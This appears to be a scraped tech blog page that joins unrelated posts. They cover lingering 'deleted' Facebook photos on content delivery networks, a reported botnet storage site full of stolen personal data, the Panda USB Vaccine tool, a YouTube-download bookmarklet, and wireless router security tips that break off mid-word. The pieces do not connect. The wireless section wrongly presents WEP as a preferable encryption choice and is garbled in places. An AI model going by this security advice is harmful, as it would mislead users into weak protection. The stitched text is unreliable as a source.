Facebook isn’t alone here. Researchers at Cambridge University (so you know this is legit, people!) have found that nearly half of the social networking sites don’t immediately delete pictures when a user requests they be removed. In general, photo-centric websites like Flickr were found to be better at quickly removing deleted photos upon request.

Why do “deleted” photos stick around so long? The problem relates to the way data is stored on large websites: While your personal computer only keeps one copy of a file, large-scale services like Facebook rely on what are called content delivery networks to manage data and distribution. It’s a complex system wherein data is copied to multiple intermediate devices, usually to speed up access to files when millions of people are trying to access the service simultaneously. (Yahoo! Tech is served by dozens of servers, for example.) But because changes aren’t reflected across the CDN immediately, ghost copies of files tend to linger for days or weeks.

In the case of Facebook, the company says data may hang around until the URL in question is reused, which is usually “after a short period of time.” Though obviously that time can vary considerably.

Of course, once a photo escapes from the walled garden of a social network like Facebook, the chances of deleting it permanently fall even further. Google’s caching system is remarkably efficient at archiving copies of web content, long after it’s removed from the web. Anyone who’s ever used Google Image Search can likely tell you a story about clicking on a thumbnail image, only to find that the image has been deleted from the website in question — yet the thumbnail remains on Google for months. And then there are services like the Wayback Machine, which copy entire websites for posterity, archiving data and pictures forever.

The lesson: Those drunken party photos you don’t want people to see? Simply don’t upload them to the web, ever, because trying to delete them after you sober up is a tough proposition.

According to a report from The Associated Press, Internet security company Prevx recently discovered a Web site that was being used as a storage facility for data stolen from 160K infected computers, and the discovery offers an interesting case study.

The storage site was hosted in the Ukraine and its contents showed that the botnet was harvesting data. Information found included passwords, social security numbers, credit card numbers, addresses, telephone numbers and other personal information; quite a treasure chest if you’re into identity theft.

“One Southern California 22-year-old could be seen registering a domain name with 
GoDaddy.com, changing his Yahoo e-mail password and ordering a meal online from Pizza Hut. His credit card number, birth date, telephone number, address and passwords are now all in criminals’ hands, though it’s unclear what, if anything, criminals have done with the information yet,” the AP notes.

But it wasn’t just individuals that were targeted. According to the article, both government and bank sites had also been compromised. The Associated Press contacted one bank customer whose Social Security number and other personal details were compromised during the attack, only to learn that he hadn’t been notified by the bank.

How to Stop the Autorun PC Virus Infection ?

The free Panda USB Vaccine allows users to vaccinate their PCs in order to disable Autorun completely so that no program from any USB/CD/DVD drive (regardless of whether they have been previously vaccinated or not) can auto-execute. This is a really helpful feature as there is no user friendly and easy way of completely disabling Autorun on a Windows PC.

Panda USB Vaccine is a 100% free utility. Its tested under Windows 2000 SP4, Windows XP SP1-SP3, and Windows Vista SP0 and SP1.

Download

copy this script into address bar:

javascript:if(document.location.href.match(/http:\/\/[a-zA-Z\.]*youtube\.com\/watch/)){document.location.href=’http://www.youtube.com/get_video?fmt=’+(isHDAvailable?’22′:’18′)+’&video_id=’+swfArgs['video_id']+’&t=’+swfArgs['t']}

Here are a few ideas that can improve your wireless network security.

Always change the password of your router as these are come with preset service identifiers. For example a D-link DI-524 router comes with a particular Ip address and a the same password. So if you are one of maybe thousands of people that have purchased this router, you have something in common. You have the same Ip Address and password for your particular router as everyone else does. If someone wanted to hack into your Wireless Network Security, it would be extremely easy. No guessing what the passwords are.

Enable encryption. Follow the encryption procedure which is provided by your routing device. Two most preferable encryption measures are WEP and WPA2; out of which the later is used most and most up to date option. The function of such technology is to encrypt traffic and scrambling it so that any unauthorized third party could not use it by throwing a spanner in order to procure sensitive details. A WEP key consists of 26 letters and numbers that help secure your network.

Remote access points should be monitored closely. Security protocols must be established in companies which run web interfaces or remote system access points. It would be wise to change their passwords frequently also. These remote access points usually get forgotten in the efforts to improve your wireless network securi